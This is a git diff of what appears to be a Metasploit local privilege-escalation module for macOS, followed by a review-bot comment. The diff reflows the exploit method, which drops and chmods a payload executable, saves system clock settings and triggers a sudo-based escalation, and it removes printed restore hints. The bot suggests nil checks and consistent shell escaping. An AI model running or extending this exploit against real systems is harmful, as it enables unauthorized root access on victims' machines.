commit
546397e66f
|
@ -116,41 +116,29 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
def exploit
|
def exploit
|
||||||
if not user_in_admin_group?
|
if not user_in_admin_group?
|
||||||
fail_with(Exploit::Failure::NotFound, "User is not in the 'admin' group, bailing.")
|
fail_with(Exploit::Failure::NotFound, "User is not in the 'admin' group, bailing.")
|
||||||
else
|
|
||||||
# "remember" the current system time/date/network/zone
|
|
||||||
print_good("User is an admin, continuing...")
|
|
||||||
|
|
||||||
# drop the payload (unless CMD)
|
|
||||||
if using_native_target?
|
|
||||||
cmd_exec("mkdir -p #{File.dirname(drop_path)}")
|
|
||||||
write_file(drop_path, generate_payload_exe)
|
|
||||||
register_files_for_cleanup(drop_path)
|
|
||||||
cmd_exec("chmod +x #{[drop_path].shelljoin}")
|
|
||||||
print_status("Payload dropped and registered for cleanup")
|
|
||||||
end
|
|
||||||
|
|
||||||
print_status("Saving system clock config...")
|
|
||||||
@time = cmd_exec("#{SYSTEMSETUP_PATH} -gettime").match(/^time: (.*)$/i)[1]
|
|
||||||
@date = cmd_exec("#{SYSTEMSETUP_PATH} -getdate").match(/^date: (.*)$/i)[1]
|
|
||||||
@networked = cmd_exec("#{SYSTEMSETUP_PATH} -getusingnetworktime") =~ (/On$/)
|
|
||||||
@zone = cmd_exec("#{SYSTEMSETUP_PATH} -gettimezone").match(/^time zone: (.*)$/i)[1]
|
|
||||||
@network_server = if @networked
|
|
||||||
cmd_exec("#{SYSTEMSETUP_PATH} -getnetworktimeserver").match(/time server: (.*)$/i)[1]
|
|
||||||
end
|
|
||||||
|
|
||||||
print_warning("Cleanup to be done in case something goes really bad")
|
|
||||||
print_warning("Execute: #{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}")
|
|
||||||
print_warning("Execute: #{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}")
|
|
||||||
print_warning("Execute: #{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}")
|
|
||||||
if @networked
|
|
||||||
print_warning("Execute: #{SYSTEMSETUP_PATH} -setusingnetworktime On")
|
|
||||||
if @network_server
|
|
||||||
print_warning("Execute: #{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
run_sudo_cmd
|
|
||||||
end
|
end
|
||||||
|
# "remember" the current system time/date/network/zone
|
||||||
|
print_good("User is an admin, continuing...")
|
||||||
|
|
||||||
|
# drop the payload (unless CMD)
|
||||||
|
if using_native_target?
|
||||||
|
cmd_exec("mkdir -p #{File.dirname(drop_path)}")
|
||||||
|
write_file(drop_path, generate_payload_exe)
|
||||||
|
register_files_for_cleanup(drop_path)
|
||||||
|
cmd_exec("chmod +x #{[drop_path].shelljoin}")
|
||||||
|
print_status("Payload dropped and registered for cleanup")
|
||||||
|
end
|
||||||
|
|
||||||
|
print_status("Saving system clock config...")
|
||||||
|
@time = cmd_exec("#{SYSTEMSETUP_PATH} -gettime").match(/^time: (.*)$/i)[1]
|
||||||
|
@date = cmd_exec("#{SYSTEMSETUP_PATH} -getdate").match(/^date: (.*)$/i)[1]
|
||||||
|
@networked = cmd_exec("#{SYSTEMSETUP_PATH} -getusingnetworktime") =~ (/On$/)
|
||||||
|
@zone = cmd_exec("#{SYSTEMSETUP_PATH} -gettimezone").match(/^time zone: (.*)$/i)[1]
|
||||||
|
@network_server = if @networked
|
||||||
|
cmd_exec("#{SYSTEMSETUP_PATH} -getnetworktimeserver").match(/time server: (.*)$/i)[1]
|
||||||
|
end
|
||||||
|
|
||||||
|
run_sudo_cmd
|
||||||
end
|
end
|
||||||
|
|
||||||
def cleanup
|
def cleanup
|
||||||
|
|
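Review bot: The clock-state reads in `exploit` (`@time`, `@date`, `@zone`, `@network_server`) index `[1]` directly on the result of `match`, so any `systemsetup` output without the expected line makes `match` return nil and the module stops with a NoMethodError, possibly after the payload file has already been written. Checking the match first keeps the failure explicit, e.g. `m = cmd_exec("#{SYSTEMSETUP_PATH} -gettime").match(/^time: (.*)$/i)` followed by `fail_with(Exploit::Failure::Unknown, "Could not read the system time") unless m`. This matters more now that the printed manual restore commands are removed, because the saved values appear to be the only record of the host's original clock settings; `cleanup` begins at the end of the hunk and its body is not visible, so whether it tolerates nil values cannot be confirmed from here. The `mkdir -p #{File.dirname(drop_path)}` call also interpolates the path unescaped while the `chmod` two lines below uses `shelljoin`; `[File.dirname(drop_path)].shelljoin` would make the two consistent.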